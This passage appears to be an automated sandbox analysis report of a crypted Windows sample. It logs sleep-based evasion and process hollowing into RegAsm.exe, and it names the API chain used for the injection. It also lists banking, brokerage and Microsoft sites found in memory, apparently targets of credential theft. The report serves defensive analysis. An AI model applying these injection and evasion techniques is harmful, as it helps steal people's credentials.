                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596859Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\ProgramData\Path\Path.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1805Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7956Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeWindow / User API: threadDelayed 1502Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeWindow / User API: threadDelayed 8124Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe TID: 4092Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4016Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -99891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -199312s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -199094s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -198874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -198656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -198438s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -198218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -99000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98766s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98641s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98422s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98312s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -98094s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -97984s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -97875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -597766s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -597641s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -597516s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -597406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -597297s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -597187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -597078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -596969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -596859s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -596750s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -596641s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -596516s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -596391s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exe TID: 3260Thread sleep time: -596281s >= -30000sJump to behavior
                      Source: C:\ProgramData\Path\Path.exe TID: 2916Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\ProgramData\Path\Path.exe TID: 6396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 3664Thread sleep count: 49 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                      Source: C:\ProgramData\Path\Path.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99328Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99109Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 99000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98766Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98641Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98312Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 98094Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 97984Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 97875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597641Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596859Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\ProgramData\Path\Path.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                      Source: RegAsm.exe, 0000000B.00000002.1667788259.0000000005827000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 0000000D.00000002.2207181803.000000000160C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                      Source: filename.exe, 0000000D.00000002.2208257467.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Path.exe, 00000011.00000002.2263127752.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q"1JfyGskaj6ZBu7eDA562hGFsoTcukhm1iZ
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                      Source: RegAsm.exe, 0000000B.00000002.1663832076.0000000003FF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeCode function: 0_2_02E224C5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02E224C5
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D91008Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user~1\AppData\Local\Temp\filename.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\ProgramData\Path\Path.exe "C:\ProgramData\Path\Path.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5445.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeQueries volume information: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeQueries volume information: C:\Users\user\AppData\Local\Temp\filename.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
